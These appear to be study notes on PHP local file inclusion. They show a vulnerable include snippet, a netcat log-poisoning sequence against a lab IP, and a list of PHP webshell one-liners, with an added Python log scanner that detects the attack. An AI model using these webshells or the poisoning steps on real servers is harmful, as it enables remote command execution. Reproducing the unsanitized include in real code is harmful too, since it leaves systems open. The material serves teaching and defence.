# LFI - Theory & basic commands

**#Identifying file inclusions:**

**Code review:**

```
<?php
 // Vulnerable: the "file" request parameter reaches include unchanged
 $file = $_GET["file"];
 include $file; ?>
```

In code that looks like this, the value of the `file` parameter is passed to `include` without being sanitized.

This type of attack assumes the ability to upload malicious files into the target application. **If this is not possible directly, poisoning log files might be an option.** Using netcat to send a request containing a malicious PHP string writes that string into the server log, where it can function as an effective hook to trigger the vulnerability.

**#netcat**

```
nc -nv 192.168.177.10 80  #connect to target
<?php system($_GET['cmd']); ?>

#Connection might hang at this point
#check out log file to trigger RC

….file=c:\xampp\apache\logs\access.log&cmd=ipconfig

  (read ipconfig of target)

http://192.168.177.10/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
```
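A defender's view of the log-poisoning sequence above, as an added example that is not part of the original notes: it scans Apache access-log lines for a raw PHP open tag and for requests whose parameters point at a log file. The sample lines, rule names and function names are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# A raw PHP open tag anywhere in a log line: the log would run code if included.
PHP_TAG = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
# Request line as Apache logs it: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Parameter values that point at a web-server log (Windows or POSIX separators).
LOG_PATH = re.compile(r"[\\/]logs?[\\/]|(?:access|error)[._]log", re.IGNORECASE)

# Constructed sample lines, Apache combined format (Apache logs "\" as "\\").
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    r'"GET /menu.php?file=current_menu.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'''192.0.2.77 - - [01/Jan/2024:10:01:00 +0000] '''
    r'''"<?php system($_GET['cmd']); ?>" 400 981 "-" "-"''',
    r'192.0.2.77 - - [01/Jan/2024:10:02:00 +0000] '
    r'"GET /menu.php?file=c:\\xampp\\apache\\logs\\access.log&cmd=ipconfig HTTP/1.1"'
    r' 200 4096 "-" "curl/8.0"',
    r'192.0.2.77 - - [01/Jan/2024:10:03:00 +0000] '
    r'"GET /menu.php?file=c%3A%5Cxampp%5Capache%5Clogs%5Caccess.log HTTP/1.1"'
    r' 200 4096 "-" "curl/8.0"',
]


def findings(line):
    """Return the set of rule names that one access-log line triggers."""
    hits = set()
    if PHP_TAG.search(line):
        hits.add("php-tag-in-log")
    match = REQUEST.search(line)
    if match:
        query = urlsplit(match.group("target")).query
        # parse_qsl percent-decodes values, so encoded paths are caught too.
        for _name, value in parse_qsl(query, keep_blank_values=True):
            if LOG_PATH.search(value):
                hits.add("log-file-as-parameter")
    return hits


def scan(lines):
    """Return (line number, sorted rule names) for every line with a finding."""
    results = [(n, sorted(findings(line))) for n, line in enumerate(lines, 1)]
    return [(n, rules) for n, rules in results if rules]


if __name__ == "__main__":
    for number, rules in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(rules)}")
```

A `php-tag-in-log` hit followed by a `log-file-as-parameter` hit from the same client is the pattern worth alerting on.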

**#PHP webshells**

```
# Basic
<?php system("whoami"); ?>

#Get command execution on target
<?php system($_GET['cmd']); ?>

# Using passthru
<?php passthru($_GET['cmd']); ?>

# Echo output
<?php echo shell_exec("whoami");?>

<?php echo exec("whoami");?>

# Returns output as an array then print.
<?php exec("ls -la",$array); print_r($array); ?>

# preg_replace() with the /e modifier (deprecated in PHP 5.5.0, removed in PHP 7.0.0)
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

# Using backticks
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>

<?php echo `whoami`; ?>
```
